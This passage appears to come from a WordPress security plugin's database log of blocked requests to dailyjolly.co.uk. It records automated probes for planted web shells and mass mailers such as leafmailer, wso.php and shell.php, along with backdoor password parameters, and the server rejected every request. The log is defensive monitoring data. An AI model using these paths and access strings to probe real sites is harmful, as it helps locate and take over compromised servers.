-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-2018.php\"}','ejgbiWIJGD9BMcUfqak3zONV',0,1674369999.0702,215,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-2019.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-2019.php\"}','Yw7mEOnSx34oyvKakZMcq9gW',0,1674369999.4363,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-2020.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-2020.php\"}','y2dLIWY6Va3ZlTmuGz7Dt9k8',0,1674369999.7703,179,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-2021.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-2021.php\"}','2yd3n0ERr9WjTsH6lhSXfaxc',0,1674370000.1037,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-2022.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-2022.php\"}','aU3SsoXbYFDzMmpdQiEAInG9',0,1674370000.4432,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-22.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-22.php\"}','tc6gUFBoa9YeKk1iWQlZX075',0,1674370000.7613,197,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/hax.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/hax.php\"}','mK2IVqJpSieusf6T0FXj7L14',0,1674370001.1183,166,'','GET',403,0,700,0,1,'',0),('20.210.237.151',349367703,'','https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/themes\\/seotheme\\/db.php?u\"}','XWFU8IQlGdVCEPZ1uyb2B9pr',0,1674376028.8967,276,'','GET',403,0,700,0,1,'',0),('20.210.237.151',349367703,'','https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/seoplugins\\/mar.php\"}','TUZuNdfR3InrpYwGMA284XeW',0,1674376029.9037,215,'','GET',403,0,700,0,1,'',0),('20.210.237.151',349367703,'','https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/themes\\/seotheme\\/mar.php\"}','lIhvsHg5j6XKFPtqx4ukUf9Q',0,1674376030.5954,207,'','GET',403,0,700,0,1,'',0),('20.210.237.151',349367703,'','https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/ioptimization\\/IOptimize.php?rchk\"}','ZexESdcpmwlyWUToPtRC2uaB',0,1674376032.8427,228,'','GET',403,0,700,0,1,'',0),('20.210.237.151',349367703,'','https://www.dailyjolly.co.uk/wp-content/themes/alera/alpha.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/themes\\/alera\\/alpha.php\"}','DYardu813bJl0qSyinQjKCgs',0,1674376033.5556,229,'','GET',403,0,700,0,1,'',0),('20.210.237.151',349367703,'','https://www.dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','ytSf4hkYgiroEIPsC8dzwRaL',0,1674376034.2980,210,'','GET',403,0,700,0,1,'',0),('20.210.237.151',349367703,'','https://www.dailyjolly.co.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','e9N1u3VWMBT5AJby2tijpRqr',0,1674376034.9788,209,'','GET',403,0,700,0,1,'',0),('20.210.237.151',349367703,'','https://www.dailyjolly.co.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wordpress\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','7TDIqLHtmXMjca6RFNfvhbC4',0,1674376035.6554,190,'','GET',403,0,700,0,1,'',0),('20.210.237.151',349367703,'','https://www.dailyjolly.co.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/blog\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','IiEcegbtoMpUmSYyfzvR4qCa',0,1674376036.3063,190,'','GET',403,0,700,0,1,'',0),('20.210.237.151',349367703,'','https://www.dailyjolly.co.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/site\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','mS50U6yRPwXn3AJLse8N9xgT',0,1674376036.9759,224,'','GET',403,0,700,0,1,'',0),('176.111.173.153',2960108953,'','https://dailyjolly.co.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','L4q8dJSl5AenCK1tDOu20oG3',0,1674377417.4958,206,'','POST',403,0,700,0,1,'',0),('176.111.173.153',2960108953,'','https://dailyjolly.co.uk/duepiqux.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','FdUVu6T0b3JmykDRvhNIZfOW',0,1674377417.7564,182,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.dailyjolly.co.uk/leafmailer2.8.php?http://www.dailyjolly.co.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','5V1pdZabhquRLrSoOX8HlPQM',0,1674386469.0199,239,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.dailyjolly.co.uk/leaf.php?http://www.dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SCYoPr0z5TJ4dNuRcWD6BH9i',0,1674386471.6200,171,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.dailyjolly.co.uk/lf.php?http://www.dailyjolly.co.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','paw4FWYqeMdnBHU1cZvu6rDO',0,1674386474.3691,226,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.dailyjolly.co.uk/leafmailer.php?http://www.dailyjolly.co.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tnfKouazCIvG8qHWyb3EBAeD',0,1674386477.1122,166,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.dailyjolly.co.uk/wp-conetnt/leaf.php?http://www.dailyjolly.co.uk/wp-conetnt/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','BiyNJl9WErXLz6MTkURoHCYD',0,1674386479.7970,165,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.dailyjolly.co.uk/wp-admin/leaf.php?http://www.dailyjolly.co.uk/wp-admin/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','gN5Ot1RQk4bhFCZAMSEjvXIY',0,1674386482.6461,185,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.dailyjolly.co.uk/wp-content/leafmailer2.8.php?http://www.dailyjolly.co.uk/wp-content/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','GSwfhgv6XP71Usoy2u5YLq8V',0,1674386485.3733,159,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.dailyjolly.co.uk/wp-admin/leafmailer2.8.php?http://www.dailyjolly.co.uk/wp-admin/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','AgiYJcbsXvKeTUQalEP3Z4wV',0,1674386488.2130,785,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.dailyjolly.co.uk/mailer.php?http://www.dailyjolly.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qQMkVn2p6ubhayLdSCvX7Jfx',0,1674386491.4523,163,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.dailyjolly.co.uk/leaf-mailer.php?http://www.dailyjolly.co.uk/leaf-mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OkiKdH2Wgm0qTzEM4R9bu1LB',0,1674386494.2521,171,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.dailyjolly.co.uk/wp-includes/leaf-mailer.php?http://www.dailyjolly.co.uk/wp-includes/leaf-mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xhbVl67iQ10EwRgvusYtJqnC',0,1674386497.1872,186,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.dailyjolly.co.uk/wp-includes/leafmailer2.8.php?http://www.dailyjolly.co.uk/wp-includes/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ryBeAo0tf4XEw9R513ncSDTZ',0,1674386499.9166,189,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.dailyjolly.co.uk/wp-includes/leafmailer.php?http://www.dailyjolly.co.uk/wp-includes/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','53F6bULVIRBvWoyh0cCqsQMk',0,1674386502.5996,190,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.dailyjolly.co.uk/wp-includes/leaf.php?http://www.dailyjolly.co.uk/wp-includes/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','cUd3jsrQSLoHbtaqOnPz0WDv',0,1674386505.3958,178,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.dailyjolly.co.uk/wp-includes/lf.php?http://www.dailyjolly.co.uk/wp-includes/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','yRG7kCesSpr3zVuaAdghtLOI',0,1674386508.1599,183,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.dailyjolly.co.uk/.tmb/leaf.php?http://www.dailyjolly.co.uk/.tmb/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9A0zFvJqP6k4wt7Sh5dWKYBc',0,1674386511.0803,608,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.dailyjolly.co.uk/alexus.php?http://www.dailyjolly.co.uk/alexus.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','snTGtVuOYHxZLl1gX0wRcP6z',0,1674386514.3461,173,'','GET',403,0,700,0,1,'',0),('147.78.47.230',2471374822,'','https://www.dailyjolly.co.uk/wp-comments.php?pw=AsAjfkel!@&path=wp-test','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.82 Safari\\/537.36\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-comments.php?pw=AsAjfkel!@&path=wp-test\"}','VSfEFs8Cle7m6nAkQNtyiocx',0,1674393415.7292,220,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QKB95G3wZXPSWq47f6vmeR8u',0,1674412018.9056,1740,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','o6r5uw0JaeAmIHKnvRQVZi1h',0,1674412028.7183,1543,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CwtFjauDXgfiPJy0sdU62qTk',0,1674412035.7925,1295,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','aBIYW0XyebpCD7NrKwx3G5Zg',0,1674412049.7963,1621,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-conetnt/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','urDVMZp9ejqzoIsfiFm8k34w',0,1674412061.5598,1047,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-admin/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZkbLaAVQ3XS1NncjWfvum5Be',0,1674412073.8466,1239,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','38eJiLctyoHNfzMxPsIphgOk',0,1674412082.8331,511,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-admin/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2SvHgFAubGTaOQUsXPdcwLqk',0,1674412103.4542,948,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','TUSaNqcweRjrmLsvJPI36ZYB',0,1674412119.9481,833,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/leaf-mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SqOpcFhGk6eH1nUQdBa4vRim',0,1674412150.0069,1134,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-includes/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','WChlzuG5NmkTn0FsH2BpgQfO',0,1674412194.4022,1062,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-includes/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','XS31tcuoGyP76LNKpnWiFVr5',0,1674412205.6089,706,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-includes/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kfFXW3OmCZEDQohHLVBgijcy',0,1674412214.7102,1105,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-includes/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','FI8eULtoAwEV9zgPHB3rpRyN',0,1674412223.4296,1284,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/1index.php?http://dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LBGbjKel4mdupcSC1YDogzXy',0,1674412239.2825,712,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/11index.php?http://dailyjolly.co.uk/11index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','rslwG8J4npx5geqT2c09BRUA',0,1674412245.7422,488,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/2index.php?http://dailyjolly.co.uk/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2KozF6uPXR3vAdDVtnaiYHce',0,1674412255.3942,351,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/3index.php?http://dailyjolly.co.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lwZB2N94u8IR673v1MYTmbos',0,1674412263.4620,472,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp_wrong_datlib.php?http://dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','47S2dnPOLC9WNrzT6Jba8YG3',0,1674412276.1999,399,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-adminincludesclass-wp-media-list-data.php?http://dailyjolly.co.uk/wp-adminincludesclass-wp-media-list-data.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zAiofIWbGBMc1nhLPyN6Cd5K',0,1674412281.1000,452,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/autoload_classmap.php?http://dailyjolly.co.uk/autoload_classmap.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','h4vOVB7SCjR3NabdUJ5sLpy1',0,1674412289.1206,651,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wso.php?http://dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','78w6zEI01DoUXBAn3qMaSHhK',0,1674412302.1505,272,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/doc.php?http://dailyjolly.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QW6umK0INGXkdPVlZE384ebf',0,1674412307.9999,549,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/stindex.php?http://dailyjolly.co.uk/stindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZgvdmbQleCGsqTUIjL7xN6S1',0,1674412316.6297,639,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/.tmb/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','KEgJqPXHp3RolCYZD4r0ft6L',0,1674412322.4239,533,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alwso.php?http://dailyjolly.co.uk/alwso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','WSUrEqOnX4LJ7xYQemcM3bH6',0,1674412322.9628,1166,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/ups.php?http://dailyjolly.co.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','DzQmPb2WrUuoMT3G1HC5nh8L',0,1674412330.5785,423,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/media-admin.php?http://dailyjolly.co.uk/media-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','sFqUvhrgc5keSB4YCPlAHMQa',0,1674412341.6708,795,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/sym.php?http://dailyjolly.co.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OTazpW3dAo8cnJwtfElVu1IZ',0,1674412347.6262,565,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/sym403.php?http://dailyjolly.co.uk/sym403.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','PmBiRULSgqtnGEefchQNYlDr',0,1674412354.7342,808,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/fw.php?http://dailyjolly.co.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1HpfqZbDE0IalmkgYsKd72oW',0,1674412359.0051,560,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/symlink.php?http://dailyjolly.co.uk/symlink.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','RJhfAOGTiDnClXQ7YSKE4cz3',0,1674412366.8061,900,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/mailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','B4FzHVEIra9TNL0xu3evcqtP',0,1674412373.8222,818,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/shell.php?http://dailyjolly.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','aiRZ8N2EghYo9jqVu4HQJndf',0,1674412374.0681,721,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/1.php?http://dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6ilXGJdjRcsfugpHILSV32bE',0,1674412380.8814,580,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/data.php?http://dailyjolly.co.uk/data.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OWlQ2tGzqVoYw49bfc0AMeRX',0,1674412388.5028,323,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-blog.php?http://dailyjolly.co.uk/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 